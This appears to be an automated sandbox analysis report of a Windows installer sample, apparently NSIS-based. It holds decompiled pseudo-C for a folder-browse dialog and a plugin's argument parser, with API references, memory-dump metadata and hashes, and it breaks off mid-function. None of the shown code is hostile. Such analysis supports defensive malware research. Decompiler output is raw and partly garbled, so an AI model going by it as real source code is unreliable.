                                                                                        							_v56 = _t146;
                                                                                        							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                                        							_t122 =  &_v80;
                                                                                        							_v64 = 0x41;
                                                                                        							__imp__SHBrowseForFolderW(_t122);
                                                                                        							if(_t122 == 0) {
                                                                                        								_a8 = 0x40f;
                                                                                        							} else {
                                                                                        								__imp__CoTaskMemFree(_t122);
                                                                                        								E00405E0C(_t146);
                                                                                        								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                                                        								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
                                                                                        									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                                                        									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                                        										lstrcatW(_t146, 0x432ea0);
                                                                                        									}
                                                                                        								}
                                                                                        								 *0x42d258 =  *0x42d258 + 1;
                                                                                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                        							}
                                                                                        						}
                                                                                        						goto L20;
                                                                                        					}
                                                                                        					if(_a12 >> 0x10 != 0x300) {
                                                                                        						goto L53;
                                                                                        					}
                                                                                        					_a8 = 0x40f;
                                                                                        					goto L12;
                                                                                        				} else {
                                                                                        					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                        					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                                                        						E00405E0C(_t146);
                                                                                        					}
                                                                                        					 *0x433ed8 = _t167;
                                                                                        					SetWindowTextW(_t166, _t146);
                                                                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                        					_push(1);
                                                                                        					E00404499(_t167);
                                                                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                        					_push(0x14);
                                                                                        					E00404499(_t167);
                                                                                        					E004044CE(_t166);
                                                                                        					_t138 = E0040690A(8);
                                                                                        					if(_t138 == 0) {
                                                                                        						L53:
                                                                                        						return E00404500(_a8, _a12, _a16);
                                                                                        					} else {
                                                                                        						 *_t138(_t166, 1);
                                                                                        						goto L8;
                                                                                        					}
                                                                                        				}
                                                                                        			}














































                                                                                        0x0040498a
                                                                                        0x00404990
                                                                                        0x00404996
                                                                                        0x004049a3
                                                                                        0x004049b1
                                                                                        0x004049b4
                                                                                        0x004049bc
                                                                                        0x004049c2
                                                                                        0x004049c2
                                                                                        0x004049ce
                                                                                        0x004049d1
                                                                                        0x00404a3f
                                                                                        0x00404a46
                                                                                        0x00404b1d
                                                                                        0x00404b24
                                                                                        0x00404b33
                                                                                        0x00404b33
                                                                                        0x00404b37
                                                                                        0x00404b41
                                                                                        0x00404b4e
                                                                                        0x00404b50
                                                                                        0x00404b50
                                                                                        0x00404b5e
                                                                                        0x00404b65
                                                                                        0x00404b6c
                                                                                        0x00404b6f
                                                                                        0x00404bab
                                                                                        0x00404bad
                                                                                        0x00404bb3
                                                                                        0x00404bb8
                                                                                        0x00404bbc
                                                                                        0x00404bbe
                                                                                        0x00404bbe
                                                                                        0x00404bda
                                                                                        0x00000000
                                                                                        0x00404bdc
                                                                                        0x00404bdf
                                                                                        0x00404bed
                                                                                        0x00404bf3
                                                                                        0x00404bf4
                                                                                        0x00404bf7
                                                                                        0x00404bfa
                                                                                        0x00000000
                                                                                        0x00404bfa
                                                                                        0x00404b71
                                                                                        0x00404b73
                                                                                        0x00404b77
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404b79
                                                                                        0x00404b79
                                                                                        0x00404b86
                                                                                        0x00404b8b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404b8f
                                                                                        0x00404b91
                                                                                        0x00404b91
                                                                                        0x00404b9a
                                                                                        0x00404b9c
                                                                                        0x00404ba1
                                                                                        0x00404ba4
                                                                                        0x00404ba9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404ba9
                                                                                        0x00404c06
                                                                                        0x00404c10
                                                                                        0x00404c13
                                                                                        0x00404c16
                                                                                        0x00404c1d
                                                                                        0x00404c1d
                                                                                        0x00404c1f
                                                                                        0x00404c1f
                                                                                        0x00404c24
                                                                                        0x00404c26
                                                                                        0x00404c2e
                                                                                        0x00404c35
                                                                                        0x00404c37
                                                                                        0x00404c42
                                                                                        0x00404c42
                                                                                        0x00404c37
                                                                                        0x00404c49
                                                                                        0x00404c52
                                                                                        0x00404c5c
                                                                                        0x00404c64
                                                                                        0x00404c7f
                                                                                        0x00404c66
                                                                                        0x00404c6f
                                                                                        0x00404c6f
                                                                                        0x00404c64
                                                                                        0x00404c84
                                                                                        0x00404c89
                                                                                        0x00404c8e
                                                                                        0x00404c97
                                                                                        0x00404c97
                                                                                        0x00404ca0
                                                                                        0x00404ca2
                                                                                        0x00404ca2
                                                                                        0x00404cae
                                                                                        0x00404cb6
                                                                                        0x00404cc0
                                                                                        0x00404cc0
                                                                                        0x00404cc5
                                                                                        0x00000000
                                                                                        0x00404cc5
                                                                                        0x00404b6f
                                                                                        0x00404b26
                                                                                        0x00404b2d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404b2d
                                                                                        0x00404a4c
                                                                                        0x00404a55
                                                                                        0x00404a6f
                                                                                        0x00404a74
                                                                                        0x00404a7e
                                                                                        0x00404a85
                                                                                        0x00404a91
                                                                                        0x00404a94
                                                                                        0x00404a97
                                                                                        0x00404a9e
                                                                                        0x00404aa6
                                                                                        0x00404aa9
                                                                                        0x00404aad
                                                                                        0x00404ab4
                                                                                        0x00404abc
                                                                                        0x00404b16
                                                                                        0x00404abe
                                                                                        0x00404abf
                                                                                        0x00404ac6
                                                                                        0x00404ad0
                                                                                        0x00404ad8
                                                                                        0x00404ae5
                                                                                        0x00404af9
                                                                                        0x00404afd
                                                                                        0x00404afd
                                                                                        0x00404af9
                                                                                        0x00404b02
                                                                                        0x00404b0f
                                                                                        0x00404b0f
                                                                                        0x00404abc
                                                                                        0x00000000
                                                                                        0x00404a74
                                                                                        0x00404a62
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404a68
                                                                                        0x00000000
                                                                                        0x004049d3
                                                                                        0x004049e0
                                                                                        0x004049e9
                                                                                        0x004049f6
                                                                                        0x004049f6
                                                                                        0x004049fd
                                                                                        0x00404a03
                                                                                        0x00404a0c
                                                                                        0x00404a0f
                                                                                        0x00404a12
                                                                                        0x00404a1a
                                                                                        0x00404a1d
                                                                                        0x00404a20
                                                                                        0x00404a26
                                                                                        0x00404a2d
                                                                                        0x00404a34
                                                                                        0x00404ccb
                                                                                        0x00404cdd
                                                                                        0x00404a3a
                                                                                        0x00404a3d
                                                                                        0x00000000
                                                                                        0x00404a3d
                                                                                        0x00404a34

                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                        • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                          • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                          • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77473420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                          • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                          • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,77473420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                          • Part of subcall function 004067C4: CharPrevW.USER32(?,?,77473420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                        • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                          • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                          • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                          • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                        • API String ID: 2624150263-3142480687
                                                                                        • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                        • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                        • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                        • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 95%
                                                                                        			E6FE01BFF() {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				WCHAR* _v24;
                                                                                        				WCHAR* _v28;
                                                                                        				signed int _v32;
                                                                                        				signed int _v36;
                                                                                        				signed int _v40;
                                                                                        				signed int _v44;
                                                                                        				WCHAR* _v48;
                                                                                        				signed int _v52;
                                                                                        				void* _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				WCHAR* _t208;
                                                                                        				signed int _t211;
                                                                                        				void* _t213;
                                                                                        				void* _t215;
                                                                                        				WCHAR* _t217;
                                                                                        				void* _t225;
                                                                                        				struct HINSTANCE__* _t226;
                                                                                        				struct HINSTANCE__* _t227;
                                                                                        				struct HINSTANCE__* _t229;
                                                                                        				signed short _t231;
                                                                                        				struct HINSTANCE__* _t234;
                                                                                        				struct HINSTANCE__* _t236;
                                                                                        				void* _t237;
                                                                                        				intOrPtr* _t238;
                                                                                        				void* _t249;
                                                                                        				signed char _t250;
                                                                                        				signed int _t251;
                                                                                        				struct HINSTANCE__* _t257;
                                                                                        				void* _t258;
                                                                                        				signed int _t260;
                                                                                        				signed int _t261;
                                                                                        				signed short* _t264;
                                                                                        				signed int _t269;
                                                                                        				signed int _t272;
                                                                                        				signed int _t274;
                                                                                        				void* _t277;
                                                                                        				void* _t281;
                                                                                        				struct HINSTANCE__* _t283;
                                                                                        				signed int _t286;
                                                                                        				void _t287;
                                                                                        				signed int _t288;
                                                                                        				signed int _t300;
                                                                                        				signed int _t301;
                                                                                        				signed short _t304;
                                                                                        				void* _t305;
                                                                                        				signed int _t309;
                                                                                        				signed int _t312;
                                                                                        				signed int _t315;
                                                                                        				signed int _t316;
                                                                                        				signed int _t317;
                                                                                        				signed short* _t321;
                                                                                        				WCHAR* _t322;
                                                                                        				WCHAR* _t324;
                                                                                        				WCHAR* _t325;
                                                                                        				struct HINSTANCE__* _t326;
                                                                                        				void* _t328;
                                                                                        				signed int _t331;
                                                                                        				void* _t332;
                                                                                        
                                                                                        				_t283 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v36 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v40 = 0;
                                                                                        				_t332 = 0;
                                                                                        				_v52 = 0;
                                                                                        				_v44 = 0;
                                                                                        				_t208 = E6FE012BB();
                                                                                        				_v24 = _t208;
                                                                                        				_v28 = _t208;
                                                                                        				_v48 = E6FE012BB();
                                                                                        				_t321 = E6FE012E3();
                                                                                        				_v56 = _t321;
                                                                                        				_v12 = _t321;
                                                                                        				while(1) {
                                                                                        					_t211 = _v32;
                                                                                        					_v60 = _t211;
                                                                                        					if(_t211 != _t283 && _t332 == _t283) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_t286 =  *_t321 & 0x0000ffff;
                                                                                        					_t213 = _t286 - _t283;
                                                                                        					if(_t213 == 0) {
                                                                                        						_t37 =  &_v32;
                                                                                        						 *_t37 = _v32 | 0xffffffff;
                                                                                        						__eflags =  *_t37;
                                                                                        						L20:
                                                                                        						_t215 = _v60 - _t283;
                                                                                        						if(_t215 == 0) {
                                                                                        							__eflags = _t332 - _t283;
                                                                                        							 *_v28 = _t283;
                                                                                        							if(_t332 == _t283) {
                                                                                        								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                                                        								 *(_t332 + 0x1010) = _t283;
                                                                                        								 *(_t332 + 0x1014) = _t283;
                                                                                        							}
                                                                                        							_t287 = _v36;
                                                                                        							_t47 = _t332 + 8; // 0x8
                                                                                        							_t217 = _t47;
                                                                                        							_t48 = _t332 + 0x808; // 0x808
                                                                                        							_t322 = _t48;
                                                                                        							 *_t332 = _t287;
                                                                                        							_t288 = _t287 - _t283;
                                                                                        							__eflags = _t288;
                                                                                        							 *_t217 = _t283;
                                                                                        							 *_t322 = _t283;
                                                                                        							 *(_t332 + 0x1008) = _t283;
                                                                                        							 *(_t332 + 0x100c) = _t283;
                                                                                        							 *(_t332 + 4) = _t283;
                                                                                        							if(_t288 == 0) {
                                                                                        								__eflags = _v28 - _v24;
                                                                                        								if(_v28 == _v24) {
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								_t328 = 0;
                                                                                        								GlobalFree(_t332);
                                                                                        								_t332 = E6FE013B1(_v24);
                                                                                        								__eflags = _t332 - _t283;
                                                                                        								if(_t332 == _t283) {
                                                                                        									goto L42;
                                                                                        								} else {
                                                                                        									goto L35;
                                                                                        								}
                                                                                        								while(1) {
                                                                                        									L35:
                                                                                        									_t249 =  *(_t332 + 0x1ca0);
                                                                                        									__eflags = _t249 - _t283;
                                                                                        									if(_t249 == _t283) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t328 = _t332;
                                                                                        									_t332 = _t249;
                                                                                        									__eflags = _t332 - _t283;
                                                                                        									if(_t332 != _t283) {
                                                                                        										continue;
                                                                                        									}
                                                                                        									break;
                                                                                        								}
                                                                                        								__eflags = _t328 - _t283;
                                                                                        								if(_t328 != _t283) {
                                                                                        									 *(_t328 + 0x1ca0) = _t283;
                                                                                        								}
                                                                                        								_t250 =  *(_t332 + 0x1010);
                                                                                        								__eflags = _t250 & 0x00000008;
                                                                                        								if((_t250 & 0x00000008) == 0) {
                                                                                        									_t251 = _t250 | 0x00000002;
                                                                                        									__eflags = _t251;
                                                                                        									 *(_t332 + 0x1010) = _t251;
                                                                                        								} else {
                                                                                        									_t332 = E6FE0162F(_t332);
                                                                                        									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                                        								}
                                                                                        								goto L42;
                                                                                        							} else {
                                                                                        								_t300 = _t288 - 1;
                                                                                        								__eflags = _t300;
                                                                                        								if(_t300 == 0) {
                                                                                        									L31:
                                                                                        									lstrcpyW(_t217, _v48);
                                                                                        									L32:
                                                                                        									lstrcpyW(_t322, _v24);
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								_t301 = _t300 - 1;
                                                                                        								__eflags = _t301;
                                                                                        								if(_t301 == 0) {
                                                                                        									goto L32;
                                                                                        								}
                                                                                        								__eflags = _t301 != 1;
                                                                                        								if(_t301 != 1) {
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								goto L31;
                                                                                        							}
                                                                                        						} else {
                                                                                        							if(_t215 == 1) {
                                                                                        								_t257 = _v16;
                                                                                        								if(_v40 == _t283) {
                                                                                        									_t257 = _t257 - 1;
                                                                                        								}
                                                                                        								 *(_t332 + 0x1014) = _t257;
                                                                                        							}
                                                                                        							L42:
                                                                                        							_v12 = _v12 + 2;
                                                                                        							_v28 = _v24;
                                                                                        							L59:
                                                                                        							if(_v32 != 0xffffffff) {
                                                                                        								_t321 = _v12;
                                                                                        								continue;
                                                                                        							}
                                                                                        							break;
                                                                                        						}
                                                                                        					}
                                                                                        					_t258 = _t213 - 0x23;
                                                                                        					if(_t258 == 0) {
                                                                                        						__eflags = _t321 - _v56;
                                                                                        						if(_t321 <= _v56) {
                                                                                        							L17:
                                                                                        							__eflags = _v44 - _t283;
                                                                                        							if(_v44 != _t283) {
                                                                                        								L43:
                                                                                        								_t260 = _v32 - _t283;
                                                                                        								__eflags = _t260;
                                                                                        								if(_t260 == 0) {
                                                                                        									_t261 = _t286;
                                                                                        									while(1) {
                                                                                        										__eflags = _t261 - 0x22;
                                                                                        										if(_t261 != 0x22) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t321 =  &(_t321[1]);
                                                                                        										__eflags = _v44 - _t283;
                                                                                        										_v12 = _t321;
                                                                                        										if(_v44 == _t283) {
                                                                                        											_v44 = 1;
                                                                                        											L162:
                                                                                        											_v28 =  &(_v28[0]);
                                                                                        											 *_v28 =  *_t321;
                                                                                        											L58:
                                                                                        											_t331 =  &(_t321[1]);
                                                                                        											__eflags = _t331;
                                                                                        											_v12 = _t331;
                                                                                        											goto L59;
                                                                                        										}
                                                                                        										_t261 =  *_t321 & 0x0000ffff;
                                                                                        										_v44 = _t283;
                                                                                        									}
                                                                                        									__eflags = _t261 - 0x2a;
                                                                                        									if(_t261 == 0x2a) {
                                                                                        										_v36 = 2;
                                                                                        										L57:
                                                                                        										_t321 = _v12;
                                                                                        										_v28 = _v24;
                                                                                        										_t283 = 0;
                                                                                        										__eflags = 0;
                                                                                        										goto L58;
                                                                                        									}
                                                                                        									__eflags = _t261 - 0x2d;
                                                                                        									if(_t261 == 0x2d) {
                                                                                        										L151:
                                                                                        										_t304 =  *_t321;
                                                                                        										__eflags = _t304 - 0x2d;
                                                                                        										if(_t304 != 0x2d) {
                                                                                        											L154:
                                                                                        											_t264 =  &(_t321[1]);
                                                                                        											__eflags =  *_t264 - 0x3a;
                                                                                        											if( *_t264 != 0x3a) {
                                                                                        												goto L162;
                                                                                        											}
                                                                                        											__eflags = _t304 - 0x2d;
                                                                                        											if(_t304 == 0x2d) {
                                                                                        												goto L162;
                                                                                        											}
                                                                                        											_v36 = 1;
                                                                                        											L157:
                                                                                        											_v12 = _t264;
                                                                                        											__eflags = _v28 - _v24;
                                                                                        											if(_v28 <= _v24) {
                                                                                        												 *_v48 = _t283;
                                                                                        											} else {
                                                                                        												 *_v28 = _t283;
                                                                                        												lstrcpyW(_v48, _v24);
                                                                                        											}
                                                                                        											goto L57;
                                                                                        										}
                                                                                        										_t264 =  &(_t321[1]);
                                                                                        										__eflags =  *_t264 - 0x3e;
                                                                                        										if( *_t264 != 0x3e) {
                                                                                        											goto L154;
                                                                                        										}
                                                                                        										_v36 = 3;
                                                                                        										goto L157;
                                                                                        									}
                                                                                        									__eflags = _t261 - 0x3a;
                                                                                        									if(_t261 != 0x3a) {
                                                                                        										goto L162;
                                                                                        									}
                                                                                        									goto L151;
                                                                                        								}
                                                                                        								_t269 = _t260 - 1;
                                                                                        								__eflags = _t269;
                                                                                        								if(_t269 == 0) {
                                                                                        									L80:
                                                                                        									_t305 = _t286 + 0xffffffde;
                                                                                        									__eflags = _t305 - 0x55;
                                                                                        									if(_t305 > 0x55) {
                                                                                        										goto L57;
                                                                                        									}
                                                                                        									switch( *((intOrPtr*)(( *(_t305 + 0x6fe023e8) & 0x000000ff) * 4 +  &M6FE0235C))) {
                                                                                        										case 0:
                                                                                        											__ecx = _v24;
                                                                                        											__edi = _v12;
                                                                                        											while(1) {
                                                                                        												__edi = __edi + 1;
                                                                                        												__edi = __edi + 1;
                                                                                        												_v12 = __edi;
                                                                                        												__ax =  *__edi;
                                                                                        												__eflags = __ax - __dx;
                                                                                        												if(__ax != __dx) {
                                                                                        													goto L132;
                                                                                        												}
                                                                                        												L131:
                                                                                        												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                        												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                        													L136:
                                                                                        													 *__ecx =  *__ecx & 0x00000000;
                                                                                        													__eax = E6FE012CC(_v24);
                                                                                        													__ebx = __eax;
                                                                                        													goto L97;
                                                                                        												}
                                                                                        												L132:
                                                                                        												__eflags = __ax;
                                                                                        												if(__ax == 0) {
                                                                                        													goto L136;
                                                                                        												}
                                                                                        												__eflags = __ax - __dx;
                                                                                        												if(__ax == __dx) {
                                                                                        													__edi = __edi + 1;
                                                                                        													__edi = __edi + 1;
                                                                                        													__eflags = __edi;
                                                                                        												}
                                                                                        												__ax =  *__edi;
                                                                                        												 *__ecx =  *__edi;
                                                                                        												__ecx = __ecx + 1;
                                                                                        												__ecx = __ecx + 1;
                                                                                        												__edi = __edi + 1;
                                                                                        												__edi = __edi + 1;
                                                                                        												_v12 = __edi;
                                                                                        												__ax =  *__edi;
                                                                                        												__eflags = __ax - __dx;
                                                                                        												if(__ax != __dx) {
                                                                                        													goto L132;
                                                                                        												}
                                                                                        												goto L131;
                                                                                        											}
                                                                                        										case 1:
                                                                                        											_v8 = 1;
                                                                                        											goto L57;
                                                                                        										case 2:
                                                                                        											_v8 = _v8 | 0xffffffff;
                                                                                        											goto L57;
                                                                                        										case 3:
                                                                                        											_v8 = _v8 & 0x00000000;
                                                                                        											_v20 = _v20 & 0x00000000;
                                                                                        											_v16 = _v16 + 1;
                                                                                        											goto L85;
                                                                                        										case 4:
                                                                                        											__eflags = _v20;
                                                                                        											if(_v20 != 0) {
                                                                                        												goto L57;
                                                                                        											}
                                                                                        											_v12 = _v12 - 2;
                                                                                        											__ebx = E6FE012BB();
                                                                                        											 &_v12 = E6FE01B86( &_v12);
                                                                                        											__eax = E6FE01510(__edx, __eax, __edx, __ebx);
                                                                                        											goto L97;
                                                                                        										case 5:
                                                                                        											L105:
                                                                                        											_v20 = _v20 + 1;
                                                                                        											goto L57;
                                                                                        										case 6:
                                                                                        											_push(7);
                                                                                        											goto L123;
                                                                                        										case 7:
                                                                                        											_push(0x19);
                                                                                        											goto L143;
                                                                                        										case 8:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L107;
                                                                                        										case 9:
                                                                                        											_push(0x15);
                                                                                        											goto L143;
                                                                                        										case 0xa:
                                                                                        											_push(0x16);
                                                                                        											goto L143;
                                                                                        										case 0xb:
                                                                                        											_push(0x18);
                                                                                        											goto L143;
                                                                                        										case 0xc:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L118;
                                                                                        										case 0xd:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L109;
                                                                                        										case 0xe:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L111;
                                                                                        										case 0xf:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L122;
                                                                                        										case 0x10:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L113;
                                                                                        										case 0x11:
                                                                                        											_push(3);
                                                                                        											goto L123;
                                                                                        										case 0x12:
                                                                                        											_push(0x17);
                                                                                        											L143:
                                                                                        											_pop(__ebx);
                                                                                        											goto L98;
                                                                                        										case 0x13:
                                                                                        											__eax =  &_v12;
                                                                                        											__eax = E6FE01B86( &_v12);
                                                                                        											__ebx = __eax;
                                                                                        											__ebx = __eax + 1;
                                                                                        											__eflags = __ebx - 0xb;
                                                                                        											if(__ebx < 0xb) {
                                                                                        												__ebx = __ebx + 0xa;
                                                                                        											}
                                                                                        											goto L97;
                                                                                        										case 0x14:
                                                                                        											__ebx = 0xffffffff;
                                                                                        											goto L98;
                                                                                        										case 0x15:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L116;
                                                                                        										case 0x16:
                                                                                        											__ecx = 0;
                                                                                        											__eflags = 0;
                                                                                        											goto L91;
                                                                                        										case 0x17:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L120;
                                                                                        										case 0x18:
                                                                                        											_t271 =  *(_t332 + 0x1014);
                                                                                        											__eflags = _t271 - _v16;
                                                                                        											if(_t271 > _v16) {
                                                                                        												_v16 = _t271;
                                                                                        											}
                                                                                        											_v8 = _v8 & 0x00000000;
                                                                                        											_v20 = _v20 & 0x00000000;
                                                                                        											_v36 - 3 = _t271 - (_v36 == 3);
                                                                                        											if(_t271 != _v36 == 3) {
                                                                                        												L85:
                                                                                        												_v40 = 1;
                                                                                        											}
                                                                                        											goto L57;
                                                                                        										case 0x19:
                                                                                        											L107:
                                                                                        											__ecx = 0;
                                                                                        											_v8 = 2;
                                                                                        											__ecx = 1;
                                                                                        											goto L91;
                                                                                        										case 0x1a:
                                                                                        											L118:
                                                                                        											_push(5);
                                                                                        											goto L123;
                                                                                        										case 0x1b:
                                                                                        											L109:
                                                                                        											__ecx = 0;
                                                                                        											_v8 = 3;
                                                                                        											__ecx = 1;
                                                                                        											goto L91;
                                                                                        										case 0x1c:
                                                                                        											L111:
                                                                                        											__ecx = 0;
                                                                                        											__ecx = 1;
                                                                                        											goto L91;
                                                                                        										case 0x1d:
                                                                                        											L122:
                                                                                        											_push(6);
                                                                                        											goto L123;
                                                                                        										case 0x1e:
                                                                                        											L113:
                                                                                        											_push(2);
                                                                                        											goto L123;
                                                                                        										case 0x1f:
                                                                                        											__eax =  &_v12;
                                                                                        											__eax = E6FE01B86( &_v12);
                                                                                        											__ebx = __eax;
                                                                                        											__ebx = __eax + 1;
                                                                                        											goto L97;
                                                                                        										case 0x20:
                                                                                        											L116:
                                                                                        											_v52 = _v52 + 1;
                                                                                        											_push(4);
                                                                                        											_pop(__ecx);
                                                                                        											goto L91;
                                                                                        										case 0x21:
                                                                                        											L120:
                                                                                        											_push(4);
                                                                                        											L123:
                                                                                        											_pop(__ecx);
                                                                                        											L91:
                                                                                        											__edi = _v16;
                                                                                        											__edx =  *(0x6fe0405c + __ecx * 4);
                                                                                        											__eax =  ~__eax;
                                                                                        											asm("sbb eax, eax");
                                                                                        											_v40 = 1;
                                                                                        											__edi = _v16 << 5;
                                                                                        											__eax = __eax & 0x00008000;
                                                                                        											__edi = (_v16 << 5) + __esi;
                                                                                        											__eax = __eax | __ecx;
                                                                                        											__eflags = _v8;
                                                                                        											 *(__edi + 0x1018) = __eax;
                                                                                        											if(_v8 < 0) {
                                                                                        												L93:
                                                                                        												__edx = 0;
                                                                                        												__edx = 1;
                                                                                        												__eflags = 1;
                                                                                        												L94:
                                                                                        												__eflags = _v8 - 1;
                                                                                        												 *(__edi + 0x1028) = __edx;
                                                                                        												if(_v8 == 1) {
                                                                                        													__eax =  &_v12;
                                                                                        													__eax = E6FE01B86( &_v12);
                                                                                        													__eax = __eax + 1;
                                                                                        													__eflags = __eax;
                                                                                        													_v8 = __eax;
                                                                                        												}
                                                                                        												__eax = _v8;
                                                                                        												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                        												_t136 = _v16 + 0x81; // 0x81
                                                                                        												_t136 = _t136 << 5;
                                                                                        												__eax = 0;
                                                                                        												__eflags = 0;
                                                                                        												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                        												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                        												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                        												L97:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L57;
                                                                                        												}
                                                                                        												L98:
                                                                                        												__eflags = _v20;
                                                                                        												_v40 = 1;
                                                                                        												if(_v20 != 0) {
                                                                                        													L103:
